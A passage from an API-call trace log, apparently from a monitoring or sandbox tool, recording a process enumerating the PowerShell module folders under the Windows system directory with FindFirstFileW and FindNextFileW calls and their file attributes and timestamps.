nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0286.539] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0286.541] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0286.541] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0286.541] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0286.541] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0286.541] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0286.541] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0286.541] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0286.542] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0286.542] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0286.542] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0286.542] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0286.542] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0286.542] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0286.542] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0286.543] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0286.543] FindClose (in: hFindFile=0x25b73f77750 | out: hFindFile=0x25b73f77750) returned 1 [0286.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d5f0) returned 1 [0286.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d5b0) returned 1 [0286.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6c0) returned 1 [0286.543] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d1a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0286.543] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x653ef8d3d0 | out: lpFindFileData=0x653ef8d3d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f76730 [0286.543] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.544] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0286.544] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0286.544] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0286.544] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0286.544] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0286.545] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0286.545] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0286.545] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0286.545] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0286.545] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0286.545] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0286.546] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0286.546] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0286.546] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0286.546] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0286.546] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0286.546] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0286.547] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0286.547] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0286.547] FindNextFileW (in: hFindFile=0x25b73f76730, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", 